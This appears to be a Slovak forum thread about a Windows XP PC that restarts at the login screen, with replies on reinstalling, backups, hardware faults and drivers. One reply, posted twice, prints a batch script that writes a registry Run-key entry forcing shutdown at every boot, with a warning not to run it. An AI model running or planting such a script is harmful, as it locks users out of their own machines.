pri starte Win Xp Pro sa mi restartuje pocitac. HELP!
-
Smoake
Star
- Kontaktovať používateľa:
pri starte Win Xp Pro sa mi restartuje pocitac. HELP!
pls potrebujem pomoc, pri zapnuti pocitaca sa mi pri nabiehani loggovacej obrazovky restartuje pocitac a toto mi robi stale dokola az mi neostava nic ine ako re-instal Win.
poradte co s tym moze byt, dakujem
Re: pri starte Win Xp Pro sa mi restartuje pocitac. HELP!
aj ja som mal taky problem ale cim to mohlo byt tak newem....podla mna preinstaluj win a mash to vybavene...ale ked necesh o nic z kompu prist tak si nastav nech ti nic nevymaze pri instalaciiSmoake napísal:pls potrebujem pomoc, pri zapnuti pocitaca sa mi pri nabiehani loggovacej obrazovky restartuje pocitac a toto mi robi stale dokola az mi neostava nic ine ako re-instal Win.![]()
![]()
..::PEaCe::..
-
Smoake
Star
a ako mam spravit aby sa mi nic nevymazalo???Digital6 napísal:aj ja som mal taky problem ale cim to mohlo byt tak newem....podla mna preinstaluj win a mash to vybavene...ale ked necesh o nic z kompu prist tak si nastav nech ti nic nevymaze pri instalacii
..::PEaCe::..
-
dudinko
Light Professional
Co myslis pod pojmom "nic nevymazalo"? Ak mas na mysli mp3, dokumenty, filmy a pod tak bud si vsetko ponapalujes alebo das to na druhy disk (ja to volam zalozny, alebo zalohovaci). Tak to mam rozdelene aj ja na C mam vsetky programy a veci ktore sa len instaluju a na D mam hudbu, filmy, dvolezite dokumenty e-booky a pod. C mozem formatovat kedy chcem a instalovat na neho Win a z D-ecka mazem len nepotrebne veci.Smoake napísal:a ako mam spravit aby sa mi nic nevymazalo???
//Edit: A este ma napadlo ze co ak to nieje chyba v soft ale v HDW? Skus vybrat disk (dvolezite slovo disk) k neakemu kamarativo a tam ho zapojit... Skus ci nabehne Win bez problemov. Ak hej, tak mas bud chybnu ramku, slaby zdroj... dvovodov je vela.
moze to byt cmdline skript,jeden typek to pisal pockaj dam ti link o co sa jedna , tu to je http://www.soom.cz/index.php?name=usert ... ow&aid=383
-
dudinko
Light Professional
Neviem ci som tak sprosty, ale nikde som tam nevidel prikaz na restartovanie pc...IMI napísal:moze to byt cmdline skript,jeden typek to pisal pockaj dam ti link o co sa jedna , tu to je http://www.soom.cz/index.php?name=usert ... ow&aid=383
dudo otvoris wordpad na napises
2. příkaz restartuje počítač při každém spuštění winu:
echo off
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\z.reg
echo.>> %homedrive%\windows\z.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\z.reg
echo "system_tray"="shutdown -s -f -t 0" >> %homedrive%\windows\z.reg
reg import %homedrive%\windows\z.reg
toto ulozis do *.cmd a spustis len to nerob lebo ti to bude robit take iste haluze ako autorovi tjeto temy.
2. příkaz restartuje počítač při každém spuštění winu:
echo off
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\z.reg
echo.>> %homedrive%\windows\z.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\z.reg
echo "system_tray"="shutdown -s -f -t 0" >> %homedrive%\windows\z.reg
reg import %homedrive%\windows\z.reg
toto ulozis do *.cmd a spustis len to nerob lebo ti to bude robit take iste haluze ako autorovi tjeto temy.
HMMM ale presne to opis co sa deje . ja som mal stejny problem mne to robilo tak ze v prihlasovacej obrazovke ked som bol rychli tak som sa este prihlasil ale hned mi to restartlo . OTAZKA ZNIE INSTALOVAL SI PREDTYM NEJAKY OVLADAC NA NIECO NAPR na BLUEttooth alebo web kamera alebo nieco ??????Smoake napísal:pls potrebujem pomoc, pri zapnuti pocitaca sa mi pri nabiehani loggovacej obrazovky restartuje pocitac a toto mi robi stale dokola az mi neostava nic ine ako re-instal Win.![]()
![]()
-
krija
VIP
prosim ta, toto ta ako napadlo? s tym HDD. na inom PC sa na 99,99% z toho disku operacny system nespusti.dudinko napísal:A este ma napadlo ze co ak to nieje chyba v soft ale v HDW? Skus vybrat disk (dôlezite slovo disk) k neakemu kamaratovi a tam ho zapojit... Skus ci nabehne Win bez problemov. Ak hej, tak mas bud chybnu ramku, slaby zdroj... dôvodov je vela.
-
xH4wK
-
Smoake
Star
mam Win professional service pack 3 en, zdroj 400W maxpower ram 1GB AM1, HDD:160GB Maxtor a 320GB WD, MB ma ani nie rok, takze neviem v com moze byt problem.A nemusis mi vysvetlovat take samozrejmosti ako neprist o data ulozene na disku, inac dakujemdudinko napísal:Co myslis pod pojmom "nic nevymazalo"? Ak mas na mysli mp3, dokumenty, filmy a pod tak bud si vsetko ponapalujes alebo das to na druhy disk (ja to volam zalozny, alebo zalohovaci). Tak to mam rozdelene aj ja na C mam vsetky programy a veci ktore sa len instaluju a na D mam hudbu, filmy, dvolezite dokumenty e-booky a pod. C mozem formatovat kedy chcem a instalovat na neho Win a z D-ecka mazem len nepotrebne veci.
//Edit: A este ma napadlo ze co ak to nieje chyba v soft ale v HDW? Skus vybrat disk (dvolezite slovo disk) k neakemu kamarativo a tam ho zapojit... Skus ci nabehne Win bez problemov. Ak hej, tak mas bud chybnu ramku, slaby zdroj... dvovodov je vela.
-
Smoake
Star
do nudzoveho rezimu sa viem dostat, po tom restarte sa ma spyta comp ci chcem spustit win normalne alebo v safe mode alebo ...brm napísal:Ani do núdzového režimu sa nevieš dostať?
Dam zapnut Win Pro sevice pack 3 zacne nabiehat bootscreen ked skonci mala by sa zbrazit spustacia obrazovka s vsetkymi uzivatelmi ale to sa nestane prave vtedy sa mi restartuje comp a potom sa mi automaticky restartuje a napise obrazovku ze daky problem s Win a pyta sa co chcem robit ci spustit win normalne alebo v sefe mode alebo ...cor72z napísal:HMMM ale presne to opis co sa deje . ja som mal stejny problem mne to robilo tak ze v prihlasovacej obrazovke ked som bol rychli tak som sa este prihlasil ale hned mi to restartlo . OTAZKA ZNIE INSTALOVAL SI PREDTYM NEJAKY OVLADAC NA NIECO NAPR na BLUEttooth alebo web kamera alebo nieco ??????
nabuduce pouzi upravit a nepis 2 prispevky hned pod seba ...
/ob3l1x
-
xH4wK